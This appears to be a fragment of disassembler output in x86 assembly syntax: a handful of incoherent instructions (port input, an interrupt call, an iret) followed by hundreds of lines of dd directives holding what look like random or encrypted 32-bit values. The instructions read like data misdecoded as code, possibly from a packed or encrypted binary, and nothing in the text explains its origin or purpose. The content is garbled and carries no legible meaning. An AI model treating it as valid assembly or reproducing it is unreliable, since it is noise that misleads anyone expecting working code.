		mov	al, 0D9h
		loopne	near ptr loc_3142A070+5
		sub	byte ptr [eax+eax*4-1799D834h],	8Bh
		cmp	eax, 1F63B0C4h
		in	al, dx
		add	dword ptr [eax-1Dh], 5D5715B9h
		mov	esi, 8A59A0C8h
		push	eax
		mov	ebp, 0B49231C2h
		adc	al, 53h
		pushf
		cwde
		inc	esp
		adc	bh, bl
		mov	ds:147A96D2h, edi
		int	43h		; EGA/VGA/PS - User font table
		inc	ecx
		iret
; ---------------------------------------------------------------------------
		dd 3BEAF224h, 0E0B56CF8h, 2A764F7h, 4BA5C941h, 27A3C910h
		dd 0D61AAEBh, 5FD0A3A6h, 81509741h, 0EF9B34DAh,	6A945608h
		dd 0F73278EEh, 632766AEh, 7FF32E8Dh, 0B799DDA4h, 9BDE7ABAh
		dd 1FE321D7h, 0DCB25681h, 8206E61Bh, 20C5B628h,	57670DDCh
		dd 3309CAB1h, 97566964h, 2E4C0EF4h, 0F9453D53h,	5825DF08h
		dd 3EB2433Fh, 32691885h, 0E0F68744h, 771E31B3h,	1465FBB1h
		dd 86492C6Eh, 0C20B3EF5h, 6F60617Dh, 1CF1A868h,	2CA31354h
		dd 75344B83h, 4AEE8AEh,	0A3791FF2h, 60E82B09h, 0E7BC5B36h
		dd 683B9026h, 0EAD0A162h, 0C9FDAC82h, 6F14D558h, 0FA22B026h
		dd 0DA9B1A8Fh, 0DC7A2BF1h, 0DC8ED89Ah, 9BD57E05h, 50DFA009h
		dd 0FD943D79h, 0F823D4B0h, 0D8C1097Ch, 566728DDh, 0F388FF8Dh
		dd 0EA216B12h, 27CB2CFDh, 49032E66h, 0E610E198h, 0BC230E3Ch
		dd 51F1E6CBh, 0F09AB40Fh, 0FAFDA584h, 99E0BA02h, 6C107C6h
		dd 0D3564D75h, 6A48696Bh, 0CB5D4547h, 0BF6327B3h, 0F510B9FDh
		dd 81A75835h, 0E44CAA85h, 4413286Ch, 29ACE85h, 0E12E9AA6h
		dd 2B5116C8h, 0CC733482h, 0FA01A90Ch, 94B64704h, 0E85C9690h
		dd 3FFABB70h, 77748D94h, 0F23EFBB5h, 0B688E0D7h, 8C8329AEh
		dd 0FFA36473h, 3550793Dh, 2AE79875h, 6408CA8Bh,	0AF3E795Dh
		dd 0A2A50EF4h, 206F30E6h, 0EB9050A2h, 0EEEB7340h, 0D0DEFF46h
		dd 61DC2EFBh, 0B0E93290h, 0BE034632h, 0B95C1DE3h, 0D87CB271h
		dd 0FA998917h, 488F8239h, 3EAFE81Fh, 4A545382h,	34AAE8AEh
		dd 0A3791D6Ah, 78E6E5D1h, 0E7BC64ADh, 0E13D6297h, 2BD0938Ch
		dd 672B0EE9h, 6014D5BCh, 9034AE29h, 1FDD92CFh, 2B7A0BDBh
		dd 73145C63h, 188D5758h, 13B21DD6h, 0A3FEC249h,	0FA2CE49Ah
		dd 9F450486h, 0EBA6AD55h, 93774A30h, 0BF2FE423h, 0A6CCBD6Dh
		dd 79C715DBh, 6BEF2E88h, 97B5FCA9h, 255415C9h, 0E05C8668h
		dd 0F3E7A60Fh, 3D78FFBEh, 8B5A9C63h, 58CD97B4h,	7A1F1F68h
		dd 9DBD85B6h, 33E824DBh, 0E0B56C48h, 735871FCh,	0EA4C0540h
		dd 0C7EB9C4Ah, 58240038h, 89D00FA6h, 70D61DC8h,	257334EBh
		dd 0EF9457EAh, 3A99CAA3h, 0FC539960h, 8C0CBB18h, 0F418AD6Bh
		dd 0D854FC54h, 0D037D8D4h, 519A29F9h, 0CEB6F2AEh, 20D93F3Dh
		dd 466AA85Fh, 9BF634CCh, 8808A5Dh, 0A74D43C0h, 620930E6h
		dd 40941585h, 6B1E9718h, 0A42F77E7h, 39F6DDBAh,	73188713h
		dd 9450373Ah, 0B636D958h, 0D87E3F9Dh, 0ABDF0B1Fh, 4CCFE86Bh
		dd 145A31A4h, 0E35DC64Dh, 24FA85Ah, 28490A9Eh, 4E6B4636h
		dd 8D8824C8h, 5BAC0526h, 0A8B89122h, 27F2B334h,	907E848Ch
		dd 2DA308FDh, 0ED5829E5h, 0DB85BEA8h, 0F69A6097h, 1808F335h
		dd 83DF9047h, 5C01C5D8h, 0D8D00B11h, 8F45EB3Dh,	44EA28EEh
		dd 0E3B85E06h, 90278BDDh, 27FC947Ah, 387B5034h,	8310E1A2h
		dd 8C32F3BFh, 0C53B7A87h, 0A2264798h, 9EFE2F66h, 42DC1D54h
		dd 53AEF032h, 0A7ADBE34h, 4A35ED02h, 8DC48BB9h,	0EE6314F1h
		dd 8AA52CA9h, 0C73297E0h, 0A1C9BA6Bh, 799EF3A3h, 3E0FA413h
		dd 0E3FB7BF0h, 0BAB940C9h, 9E7334EAh, 8DF11269h, 63E6105Bh
		dd 5FB1EF39h, 559FDC17h, 668922C2h, 133ECF9Fh, 0EC367713h
		dd 23D515A9h, 0CE89CC8Eh, 3001053Dh, 43725708h,	0E09FAABh
		dd 7A2986A2h, 97673751h, 0C84789E6h, 0C0075208h, 29BEFACBh
		dd 0BA2BC218h, 51C69DEFh, 0D69B2FA3h, 940AD0ACh, 490B49D3h
		dd 0E854BA60h, 8E5FE417h, 0E242C465h, 0C10DD65Fh, 0A0DE209h
		dd 7E0D829Eh, 93637755h, 0B1ABA9E2h, 664DDD8h, 3AAE6F22h
		dd 1B330081h, 66EF3653h, 4761D5BCh, 80FA362Ch, 0E60819CFh
		dd 842B6DA1h, 63640E43h, 188D5404h, 4E8660D2h, 78753D76h
		dd 60A66B92h, 77453697h, 3E98D5B2h, 0E21DB553h,	0EEAA5B08h
		dd 0F080CDCh, 1EEEAF67h, 41114477h, 19CDF399h, 0AE643FCAh
		dd 2F8CDB04h, 0F29759F0h, 27E37A31h, 678ACD9Ah,	58FCD624h
		dd 0BE94E093h, 902B52E8h, 7D31E050h, 0B4F323ABh, 0FD47801Fh
		dd 0B14475BEh, 46DBB92Fh, 385C9FD7h, 0A32A6559h, 6FD212F8h
		dd 32F8F7CAh, 0EFCC0E54h, 11B669ADh, 33D889DEh,	55FABB73h
		dd 771CDD94h, 983EFFB5h, 45337786h, 0ECA84E6Ch,	52FACE1Bh
		dd 0DBB046B9h, 1E2446BDh, 17AABC3h, 0E0468DECh,	0CD2F41A0h
		dd 0BA1B5383h, 88F50154h, 7FDB255Eh, 43D4E038h,	3284C31Dh
		dd 1F18ADF1h, 0F8488FC2h, 0F55C73B6h, 0AC1F5A87h, 96F62772h
		dd 5FC1C35Ch, 4A82C129h, 0C6C8018h, 0F146A5FBh,	0C42763B0h
		dd 0B7282CA3h, 82F82F61h, 6AC11D76h, 6AA3E22Dh,	2880F06Ah
		dd 3D71A1EDh, 0E4599AC8h, 0C0304DAAh, 0D41E5A94h, 97FE2F50h
		dd 70E91B41h, 5EBEC525h, 39738179h, 294690FBh, 0F72969D3h
		dd 0F21744BBh, 82E61932h, 6AC21852h, 5F898D30h,	21BADB0Fh
		dd 0F71B4FAh, 0F857B4A9h, 0CB387C8Dh, 0A20243ACh, 86E23B66h
		dd 14F80954h, 70AFF914h, 0B98D21Ch, 7A7A9AFEh, 0DA3567FEh
		dd 0EA0648B2h, 0E0E02B94h, 4FD30D58h, 48BCEE2Eh, 2A82EA06h
		dd 56C80E0h, 0CE2FB1C3h, 0C41C66ADh, 0A81F418Eh, 8BFA3744h
		dd 11F71242h, 60ACFC17h, 308EC80Bh, 57599F9h, 0F74A9CD0h
		dd 0BA2158A5h, 88F626BEh, 0B8D3087Eh, 6EA0EA54h, 382C53Eh
		dd 106C8D81h, 0F54689F6h, 0CF396F94h, 0AC2830A7h, 99F5047Ch
		dd 63DD1A59h, 5BB1D24Ch, 2284D238h, 3676B6F9h, 0D33ABAC9h
		dd 0D90A69B6h, 0BD134A99h, 95F90F5Eh, 68A0EF4Bh, 7F8DCB32h
		dd 0F69817Dh, 0C04B89FCh, 0C02666ACh, 0A40460E2h, 85E50260h
		dd 70DC0E54h, 4A9D9109h, 289BE51Ah, 29729AFBh, 90539BC4h
		dd 0DC3D6980h, 0B11652B7h, 86EB3C5Eh, 59DA105Ch, 5FAFEF57h
		dd 33739217h, 0E5081F9h, 0F03756BCh, 0B2144DBDh, 8ACE7833h
		dd 5DE1850h, 44A3FF14h,	7A9DDC03h, 13759FBAh, 0E960F3DDh
		dd 0C71271AAh, 83765281h, 9BD12D6Ah, 60F81F5Dh,	54B2EE27h
		dd 2B98CA00h, 1F4CE0D6h, 0F02844CDh, 0D70C74BEh, 92E03293h
		dd 76C23B1Fh, 41A5E307h, 2386C537h, 0D619D85h, 0DC2F80C3h
		dd 0DB307FA6h, 0BA165DBCh, 86D23043h, 47B61242h, 46ACEB39h
		dd 39BBD713h, 777FB2F8h, 0EC578DE2h, 0D60967B2h, 0A8CC439Ch
		dd 8BC9015Ah, 5295F24Eh, 2E8EDE36h, 176CADE4h, 0E04083F6h
		dd 0D3030EAAh, 0A80A42A5h, 82D6377Ch, 43B21646h, 4AA6D638h
		dd 193C30Fh, 167BB6E2h,	0DA3A88C2h, 0D32E5EA7h,	881B4B94h
		dd 9FFC0E65h, 6484F14Ah, 7D97EA5Bh, 1464A30Fh, 0E242BBFBh
		dd 0CD2663B4h, 881F62E2h, 8EDA3E65h, 6FE11843h,	5FB3F41Bh
		dd 4D9CDC03h, 1F5BA1C2h, 0F97099C8h, 0FC587CA3h, 0B10A7485h
		dd 99E90D7Dh, 6BCE1B56h, 5FB4CF03h, 284FC217h, 134694D5h
		dd 0EB2663EFh, 0C10947B7h, 91D83E4Eh, 66CF1F4Dh, 55A5DB30h
		dd 258FDA12h, 47DB4C5h,	0C2328ADBh, 0CB2144BFh,	0A9254E9Fh
		dd 9FF22D7Ch, 7BDF1478h, 42BAF121h, 5893D11Ch, 84894D9h
		dd 0CA2476D0h, 0CB1756B2h, 85C82A9Ch, 7BD50772h, 48BDD841h
		dd 2582C236h, 3B68AAEAh, 0E74682D2h, 0EA3E46AFh, 9E1A4784h
		dd 81FD2478h, 42E17749h, 52ACCA11h, 258FCF00h, 1870BE94h
		dd 0F74D9AC6h, 0CE054AB4h, 0B2ED20F9h, 8AC00075h, 54A0E13Dh
		dd 3694C737h, 567B3E3h,	0F72B89CFh, 0A73B6DA1h,	0AD015595h
		dd 88FF2108h, 0DC61641h, 4AA0FB05h, 2593D91Ch, 77B5D3h
		dd 0FA5BB3D4h, 0B63971B7h, 0BD0A51BCh, 8EFA0F65h, 5FB5E77Eh
		dd 5B8DCA34h, 460B21Eh
		dd 0F5469CCDh, 0CD000AA5h, 0AB194996h, 97C33A61h, 9EF0143h
		dd 4EA4FF01h, 3997DD18h, 171A5C3h, 0D15A85F8h, 0C63650CFh
		dd 0B1144994h, 97FE0F67h, 74D43851h, 7E9EA032h,	1551832Fh
		dd 390DD6A9h, 0CD454AF0h, 0AD244FBBh, 0A8ED396Fh, 57AA1247h
		dd 5783EA21h, 2CA5C103h, 2A6894F1h, 0EB57A1A9h,	0DC31609Ah
		dd 0BC176194h, 8AD23C7Ah, 71EB7A70h, 42BECF34h,	2D91DF23h
		dd 3B67A5F2h, 99A881B9h, 0D632ECF0h, 88546FDh, 1832492h
		dd 21A38A2Bh, 2CB8FC32h, 38C14580h, 0DD7F242Dh,	0F90052A2h
		dd 0E6CBB9h, 6C946626h,	84497BEAh, 33E8B385h, 96F27FF1h
		dd 0DE9950C3h, 0AB3ECFA0h, 0BA0A7128h, 497D4D93h, 0FE934F62h
		dd 0A4CA46B8h, 42E7A8CFh, 3A8AA2D1h, 51A0ECA2h,	6BC60EAEh
		dd 0C907708Ch, 81904208h, 0DD82128h, 2F8A1624h,	0F6DD6Eh
		dd 0E6E789C3h, 940AD10Ch, 23A3448Ch, 0D84E15F4h, 0A6EB9E92h
		dd 9410FB2h, 3200A46Bh,	700553F0h, 5024E8AEh, 71B65997h
		dd 0EFC6A969h, 68014E34h, 9AE764Ah, 0D42FC5A0h,	8C773895h
		dd 0E214E5A6h, 902F4E22h, 4D1BF1CFh, 51F1C40Eh,	0F6AB77A2h
		dd 17DF1B8h, 837A057h, 0D7FE3D86h, 4D09511Fh, 0EB8583BCh
		dd 0CE8A5D5h, 0B884A19h, 0FA55943Fh, 0E4934ACFh, 49EE4733h
		dd 0EA4DD188h, 0BC288144h, 239D26CBh, 0E056FB68h, 0A3C3080Fh
		dd 45E82A60h, 1CEE09ACh, 5C7ABE45h, 7B8A1FB3h, 0C1413293h
		dd 0EB632019h, 0E0854615h, 0EF26351Fh, 24F990E0h, 0D3665309h
		dd 683DD4E9h, 0A9E2A2F6h, 0AB7B12ECh, 0AB7FF069h, 0F526D3CBh
		dd 317B771Eh, 296C1C97h, 55DEBB42h, 0B441DDBEh,	9954FEDFh
		dd 0C99F1228h, 5997BCFDh, 965311DBh, 20C58636h,	41BC78D4h
		dd 0D184F6D1h, 851BF672h, 0A641B44Fh, 43E430E6h, 0EB905300h
		dd 0C6998B29h, 0DC1F1E2Ch, 5482D6C8h, 98ED3BD7h, 9BFD7873h
		dd 0E5889684h, 8C2EF37Eh, 0A8CE217Dh, 893E7D53h, 3ED38E96h
		dd 0EB0902FEh, 0B10DD50Bh, 209E21C0h, 0C2AC2B08h, 0E7644E6Eh
		dd 0CAAD38AFh, 0F70421h, 0C9F7B35Ah, 0AF27DD84h, 192C47EFh
		dd 82733E5Ah, 5998CCF1h, 8313C51h, 0DB5C0BFCh, 3ADF4802h
		dd 0DD5CC279h, 4D388677h, 0B4D88DBCh, 426718F5h, 0E3806E7Ch
		dd 513EF2Dh, 0CB4D8D44h, 49EEAD6Eh, 6A14B9DCh, 19CDF3A9h
		dd 0AE643F96h, 54FBCB66h, 0F2965D2Bh, 14D32A31h, 36DB98BBh
		dd 0CAFE875h, 0EFE0B797h, 9C7128E0h, 29EEEDE8h,	0E08547F9h
		dd 0CD394Eh, 4CC8E010h,	6EBAC63h, 4D9831D7h, 1F2FC08Ch
		dd 0F025E44Dh, 0C91B60BAh, 0B894560Dh, 3192C3D1h, 0CCD89952h
		dd 65D1B2E7h, 0B7998494h, 8CDDE9C1h, 0D0B4AA87h, 8BD311F9h
		dd 5B369A4Dh, 79C5B617h, 929268DAh, 659C35D7h, 82BDC88h
		dd 0F01F4A93h, 4437748Ch, 0EB91569Fh, 0CD81D82Ah, 0DC8D8526h
		dd 1A6E7C5h, 234889C0h,	0B9AF04E3h, 375C2DF9h, 0D87C3731h
		dd 0DEEB9E17h, 0E5547D31h, 6DE39471h, 4AFC5382h, 437AE8AEh
		dd 9DC90AC4h, 836A59E8h, 0F2F0C38Fh, 104D6F16h,	3BD004C5h
		dd 9CF1B35Ah, 0EBC62ADAh, 6FBEF86Dh, 0BD5819CFh, 0D47ACB75h
		dd 0CCA5DD13h, 98FB6E40h, 0BED0A069h, 5C01C298h, 803DA1Ah
		dd 0A1C4404Dh, 8629618Eh, 2C036875h, 4AAB2DE4h,	4D9D436Fh
		dd 1AB8FE66h, 41E14477h, 0B76BF399h, 11D11A0Ah,	397637EDh
		dd 0F29759BEh, 46E944B0h, 0B3D4CA1Ah, 58FDBED0h, 0D6172614h
		dd 184E0F85h, 0BE632442h, 13F066C1h, 0D9D54B3h,	24C906C4h
		dd 66E60163h, 552DEEA5h, 0FD4A9787h, 97FD6DBDh,	4C0F41CAh
		dd 87B4A972h, 60C3035Ah, 43DBE7D1h, 20D59448h, 885B1BFCh
		dd 220FF0B5h, 0BA6006C7h, 23D0A10Eh, 0CE89FC8Eh, 7005B53Dh
		dd 0AAB7F80Fh, 6409CA88h, 0EB5C83E6h, 0C32C61A8h, 0C8FACFE6h
		dd 6E906223h, 3E8407EAh, 4511C85h, 0F68745h, 731BD9F8h
		dd 0C26BAA35h, 0B3C9E283h, 557E0FDEh, 0CA843D82h, 0D5F2D239h
		dd 6CB3F50Fh, 0F5FA972Ch, 8117C2ABh, 5C6D0E47h,	0F5412D77h
		dd 674FB604h, 39BB00ABh, 0E8299048h, 49D6EFE1h,	6F14D564h
		dd 7DB7AAADh, 0B26804A6h, 0FA09867Ah, 43105D23h, 188D504Eh
		dd 0B7545B54h, 5C31EC0Eh, 0F8A84169h, 9F7528CFh, 0EF08BD55h
		dd 668B4A30h, 59A4545h,	0AFA48FCDh, 0B6EEAF75h,	5B3A481Dh
		dd 0D0FB18A9h, 0C722708Fh, 802A528Eh, 9BE42067h, 59D51B52h
		dd 44B4F136h, 8ACEBE0Ch, 8C4D2F1Ch, 7DC25060h, 0BD234ED8h
		dd 8AD71104h, 0A512E507h, 9DC9BA5Ch, 46EBAC74h,	9640CA08h
		dd 0EFD00F59h, 0E6559F63h, 0CD7334EAh, 0A819FD6Ah, 0F584DC2Ah
		dd 0D173FFFCh, 366F3689h, 231CEDBAh, 676CF9DFh,	8A4AE842h
		dd 0F8F6C8F9h, 0E667E613h, 0A5CA46B8h, 42E7A9FAh, 4461CAEBh
		dd 0D32BECA3h, 32B205AEh, 0C95F1A37h, 609C0C83h, 903B6364h
		dd 2FE4BB2Bh, 7F9D3AE7h, 9099D9A0h, 9BC50BB1h, 0B6364E82h
		dd 6D81399Fh, 0FAAF4F74h, 36B417C6h, 0C1B3A46Bh, 502BA5C8h
		dd 80B2179Eh, 0FB493AEAh, 0CAF8EC67h, 0E78D1A80h, 322F0926h
		dd 27A4CB05h, 0D0674C39h, 8614E5A6h, 9036F6ECh,	0B290A742h
		dd 63753BF1h, 8216435Dh, 1CD56104h, 6DDFA056h, 76545786h
		dd 2A75E4AAh, 0B5589343h, 82EC28EEh, 684B493Ch,	0D6A91372h
		dd 0ACECFFCFh, 7D63B72Ch, 68BD80BBh, 8D4A726Ah,	0DC3146AEh
		dd 22943299h, 0DB3AB256h, 66325E3Dh, 0C5D8C577h, 57E1ECFEh
		dd 7951E420h, 1E75896Ah, 0F0E8D7D8h, 8F30CFF5h,	89A75831h
		dd 437CB177h, 34EB9C4Dh, 0FB8E506h, 0B22FC088h,	9B7F797Dh
		dd 0BCF03BEAh, 0DC6BA9F3h, 6203FEEEh, 0BAD8A97Eh, 65D4CCFFh
		dd 1D4C8D94h, 9954AFB6h, 0BA6021BFh, 597D1479h,	0FE937063h
		dd 0AE013C2h, 0CF18A86Fh, 6439DFF9h, 8AD41421h,	58B23540h
		dd 0AAEAB919h, 81906226h, 5BB2192Ah, 0BE416A1Ch, 0DAF68744h
		dd 4336AE15h, 96DA3AB1h, 0B6364D83h, 0F213AA0Ah, 7F166127h
		dd 1CF1AC42h, 3E8970D0h, 3037392Fh, 0AF445D61h,	36B60AF0h
		dd 0C55B066Bh, 0C9EFCB8Fh, 0D276F16h, 2A456E6Ch, 0C6F28340h
		dd 0DA9FE9DFh, 9006D9D6h, 86424D44h, 4151C57Ah,	0F6AB7374h
		dd 36CAF3BEh, 1172A067h, 0A6E369BBh, 60436117h,	0CE14068Ch
		dd 9036788Dh, 0C9BDDFFFh, 0FAFA6B12h, 17E68CD1h, 3ACB6C66h
		dd 0E2AFBB2h, 0E05092C7h, 0EE6E71AEh, 0BC135F9Eh, 0DCA56A63h
		dd 38D51655h, 65DBAD7Eh, 1DA9ED2Ch, 0F5CBCDAh, 0F22470CBh
		dd 0D00C67AFh, 8CEA3489h, 5ED30D4Ch, 52BBEF12h,	358ECF0Ah
		dd 9659DD9h, 0C84B95D4h, 0D83471ABh, 0AC236899h, 8AF9377Eh
		dd 62C4125Ah, 41B1DF0Ch, 399BCC17h, 1B738DF8h, 0C4479CDCh
		dd 0D4015584h, 0B8F0229Dh, 98CC174Bh, 7CA0EA54h, 2A93DD1Eh
		dd 1E60B8EEh, 0F56A88C7h, 0C42462B4h, 0A6064487h, 0A7CC2166h
		dd 0DC60043h, 7B92DA1Fh, 14A4F639h, 107194CCh, 0FB4994C3h
		dd 0E10069B5h, 0B71A519Ch, 0B9C31260h, 79B3F04Ch, 5BB5D035h
		dd 0F6CB50Fh, 0F962B4F0h, 0D12666B0h, 916B5E87h, 82EB3C65h
		dd 7AC12752h, 2BD2913Ch, 4DF2E36Ah, 1D64D58Ch, 0FD5F8FC2h
		dd 0D92C77E1h, 0A4165583h, 98F27372h, 56BD1153h, 1A94E31Eh
		dd 3D76A113h, 1C5289EBh, 0DA1653B6h, 8B0A088Ch,	0C3C6034Fh
		dd 77C31D04h, 2DFFF830h, 49EE4733h, 0EA4DD188h,	0BC122144h
		dd 0C1D1D3CBh, 0D07607F8h, 0D8F6CCF0h, 0FC787A01h, 5CE7E84Ch
		dd 4D48356Bh, 231FD0BDh, 0E96F3E15h, 80E242F1h,	0C3F05B02h
		dd 2986D592h, 52428A71h
		dd 204EFB61h, 2A884320h, 62FC08Fh, 9B787A4Dh, 8BFACEEAh
		dd 11DADAF6h, 0F3B7C6D5h, 0BE86729Fh, 65EF12F7h, 77768D94h
		dd 0DC1F1DFh, 0BA500BAEh, 0D4A63F7Ah, 16E5101Fh, 20C58635h
		dd 6CA4EE0Ch, 644586C5h, 0AF7A795Dh, 67460EF4h,	0CB052492h
		dd 12EDBA58h, 984D8CD5h, 2FE4BF41h, 538277EBh, 78F0096Fh
		dd 0C73AFBB1h, 0F9035E95h, 943A11A6h, 6F60615Bh, 1CF1A868h
		dd 0C11AF2B3h, 600E2E82h, 0D272E89Eh, 917A5885h, 892768CCh
		dd 9619B104h, 0E1AE5F0Ch, 2BD09142h, 3F82C01Dh,	960BBE5h
		dd 6F66F7ECh, 8272145Ah, 0CDFFB2F1h, 0F99B6D39h, 2630F304h
		dd 0B3DF904Eh, 6C2AE5FCh, 0E8DCB59Ah, 9F752CCDh, 0C163404Dh
		dd 56054A00h, 59A7269h,	2A71001Dh, 0A1EE9F4Dh, 94EF2228h
		dd 1CB734CFh, 0AE5425EBh, 42D3B4BDh, 0F297692Fh, 34E9EFBCh
		dd 628B9C63h, 5897BF1Fh, 7A1D88C5h, 9BE82B9h, 0BE530FCAh
		dd 95DF8678h, 812AE53Dh, 76C9BA61h, 0F366AA09h,	683DEE15h
		dd 0D97FA6F2h, 3EAE4099h, 0CD431FFFh, 0E201A954h, 0D7B64705h
		dd 3F5B7D5h, 4712BB72h,	88E32267h, 0A82C8238h, 0F6E5E6D7h
		dd 8A8273ECh, 16903A4Fh, 0DF3A74C0h, 57AB2D98h,	305FCAB1h
		dd 6BC3D8FDh, 60B2F136h, 0F97A7C63h, 0B4E80408h, 0FF6D9B1Eh
		dd 0AA136AB3h, 51C6A222h, 276EBCC6h, 11B73282h,	0B66C33ACh
		dd 892F6EA4h, 0ABCE3047h, 36A817C6h, 0AB1CA46Bh, 6035EC1Ch
		dd 0F438005Fh, 0A345E2B4h, 8D382CE2h, 0B7CD1948h, 45EA416Fh
		dd 0BE2F9104h, 4DC2991Bh, 6F14D964h, 0C37EA4ADh, 0D30E6DAAh
		dd 951F4E9Dh, 63640D13h, 188D5438h, 156A2DC4h, 3401F252h
		dd 7D23E452h, 60456CEAh, 0F14D654Bh, 5D1DC700h,	88AA5B3Dh
		dd 17E77AF9h, 1EBCF966h, 41094477h, 48B1F399h, 75C198C7h
		dd 807607F2h, 0A4963358h, 14BB1263h, 0E5241C53h, 0A707139Dh
		dd 48A26368h, 9C4132ACh, 360B2FAFh, 1F8546EEh, 328DF18Ah
		dd 24C56241h, 15BCAC63h, 5B468DCAh, 0C56BDE94h,	3EAE1284h
		dd 0CD431E9Bh, 0EF933E9Fh, 0A43B772Eh, 33E881F2h, 8847362Bh
		dd 9F1CEDBEh, 67C10D85h, 0BA602D3Fh, 92CB14F9h,	0AAE62B52h
		dd 6C89C213h, 3372575Fh, 0E109FAABh, 0B0AFE362h, 344D0EC6h
		dd 0C96F358Eh, 0B25DF08h, 54B24332h, 52D28C1h, 0A81EB75Eh
		dd 0F0E72661h, 0A410060Ch, 32531DD3h, 0D87E3DE5h, 0FB0F8D96h
		dd 74958239h, 3EE3A55Ah, 4AD85382h, 45A6E8AEh, 0A3490B50h
		dd 0AFBFA7B2h, 72731C04h, 99E45DBh, 5E8951CDh, 5E7ADB67h
		dd 0FAEBD58Ch, 9006DD34h, 0FDBFB24h, 0D44A1B63h, 7BB22813h
		dd 289DE8B0h, 0AF20F057h, 5C31E890h, 0F92C241Fh, 9F450735h
		dd 4A6B6855h, 6CB8B500h, 358AF9A7h, 9494B44h, 48EE9F4Bh
		dd 6A7AD1E2h, 19CDF1C3h, 0AE643F3Eh, 0DF89CF6Eh, 0F296398Bh
		dd 8134E931h, 36EBBCDDh, 0BAFAE1Fh, 50FA7568h, 5CC40289h
		dd 0BF23A1D4h, 5D0846FDh, 29748AFh, 252182F0h, 2E145394h
		dd 680DCE11h, 0C9DBF8h,	540536FCh, 0FD59517Fh, 5129DB0Ch
		dd 0A0B6470Eh, 0C53A7151h, 0C077448Dh, 772CFD3Fh, 8C56FFDFh
		dd 0E86021D7h, 2D17BCAAh, 73A35531h, 0ADD1A279h, 72C9D7CAh
		dd 0D2069A81h, 0A16F67A8h, 0AFADCFD0h, 0DB6E7AE4h, 0A1825042h
		dd 29F67829h, 20351544h, 0FE57AFh, 633C9D9Bh, 196AC94Eh
		dd 8677326Eh, 0D862D7F5h, 0D4BA6117h, 32E1FA0Fh, 4C38A7Bh
		dd 4E20E358h, 0F90290A6h, 0A93A2FE0h, 8B2263A8h, 18DB4E24h
		dd 398476B3h, 87141048h, 27F2B36Ah, 3C43858Ch, 0BAC76252h
		dd 3FD319FFh, 0D44A2EC3h, 0ED785D79h, 49B0B75Eh, 3ADFA5BFh
		dd 3824E479h, 8274E490h, 0AF6F1F29h, 0CDA3ABDEh, 8B83A150h
		dd 5AA6B2Ah, 70830C9h, 1AB9AF56h, 41E14477h, 4CB7F399h
		dd 1BD941B5h, 0D0461CC2h, 0E7A5FC8Ch, 99B97A01h, 6F6B2DEh
		dd 32339575h, 2949B197h, 0B6AC9746h, 46E024EBh,	71AA38FDh
		dd 0B72A9694h, 24F9A16Eh, 0E819A1D3h, 806DDEF0h, 76D0064Ch
		dd 484660A9h, 0CC04B9E3h, 201FBCE7h, 0AC3BB905h, 33E8B27Fh
		dd 0A27D1F81h, 884F647Fh, 0A8141E20h, 0D5DDA1D7h, 0DD8273ECh
		dd 0CECB4F6Fh, 0DFC58648h, 72CD31CAh, 4AB44A81h, 852BDC8Fh
		dd 228A1FB0h, 0C95F1074h, 0EB905208h, 209CF6ECh, 0C6D4957Ch
		dd 0AE094966h, 731C1BCDh, 0B9154E3Ch, 490A1DE3h, 0E8547E60h
		dd 567E217h, 1C7A0636h,	0BB6AA45Bh, 6035E84Eh, 7E71E8F4h
		dd 93638755h, 0CAABA9E2h, 0E78CEA80h, 596E4426h, 7BD3FB18h
		dd 4D9AB200h, 39D4D58Ch, 0BA136252h, 4ADB19FFh,	0DEFE340Eh
		dd 7F9B5D10h, 289349B0h, 1522D57h, 0D101F257h, 4D0DA70Fh
		dd 0F51757BCh, 549878DEh, 0E3B86049h, 0A5593A1h, 27CE55C0h
		dd 0B6EEC566h, 5B3EE63Dh, 0C9A70CA9h, 2D5425E1h, 5479C815h
		dd 0F2975BCEh, 3AF2FFB8h, 0FFE89C63h, 8AC7D76h,	2B1B8AC6h
		dd 0B276B746h, 2B9C24EBh, 0E0B56CD4h, 86A8A89Ah, 24C988DCh
		dd 0C3626550h, 683DE0CAh, 0E17EA1F7h, 0AB5E12D7h, 0B8E6CBBAh
		dd 6A946626h, 473278EEh, 0BAD89952h, 65D4E8F7h,	3C971E94h
		dd 0C6BC478Dh, 685321D7h, 2D7582FAh, 7B2A84ECh,	20F5A862h
		dd 0FADBE3D4h, 6409D081h, 44283E91h, 46BAFF33h,	0E738B56Fh
		dd 0E4535238h, 0F4B4389Dh, 7C59A3AFh, 1241B876h, 3AC8DA84h
		dd 97123ADAh, 0E9669C03h, 21105682h, 79D67F63h,	6EC08E43h
		dd 2A82F84h, 631184F6h,	0C5AAF8DCh, 7ABEF588h, 4050EDC1h
		dd 0E7BC604Fh, 4D2536E5h, 0A3599D6Ch, 4DF2B3D2h, 0E4D715BFh
		dd 1D3D1C62h, 82753672h, 0BF1C7F1h, 0CA379420h,	24BB0C54h
		dd 16DDD72Dh, 3D6859h, 531F08EEh, 9F79DBC8h, 984C0ABh
		dd 0A6B54B8Bh, 71AA2E7Ah, 649FB04Fh, 0CCE1AF34h, 94EF2EC1h
		dd 0DB0FF022h, 0A1175B82h, 2F890B69h, 0B1C064F0h, 90B63464h
		dd 0C9246362h, 6BBEE948h, 5C9BEFA5h, 0A1BEFD46h, 0F137778Bh
		dd 1F9EC2F2h, 0D99497E0h, 0DB37C9A9h, 486FA39Ch, 5BF2317Ah
		dd 89391874h, 0C5B912C8h, 258CCB15h, 0EF94560Ch, 915BF673h
		dd 0DAD8A977h, 55FABA6Dh, 0FC2E22F0h, 0A810AC00h, 98E945D7h
		dd 91BCC29Fh, 0F6266A41h, 0ABC5863Ch, 9CE49401h, 34324BE7h
		dd 7DAEE3E7h, 504D0EC4h, 0E96F26A5h, 6E9F5208h,	0DB273C1h
		dd 2D88D6BAh, 51173361h, 0D99D990h, 0B41ADB91h,	62D812F3h
		dd 307E3FF5h, 5609FD8h,	1C080036h, 7C68A45Bh, 704F4D75h
		dd 855429B5h, 0A6A2CAF3h, 8FE2E4E1h, 0BC09C714h, 0E1AE5F08h
		dd 0D42F6F36h, 4DF21C82h, 38895E8Ch, 9336C783h,	82764252h
		dd 29ECD3F1h, 7294A2ECh, 18BD7EBAh, 148C15DCh, 28AC249h
		dd 95FDE7A6h, 60BAF8C3h, 8BE655ACh, 0E3882A24h,	5354E0C2h
		dd 0AAD8F747h, 79FEAFD3h, 7B6AD288h, 8C347310h,	0BA742CBh
		dd 0D295365Ch, 0ACC8FDFCh, 86887563h, 36591BDEh, 0D19BBE75h
		dd 85E07D07h, 7BDDEA46h, 3539DB24h, 0AA864AB7h,	4E6E50Fh
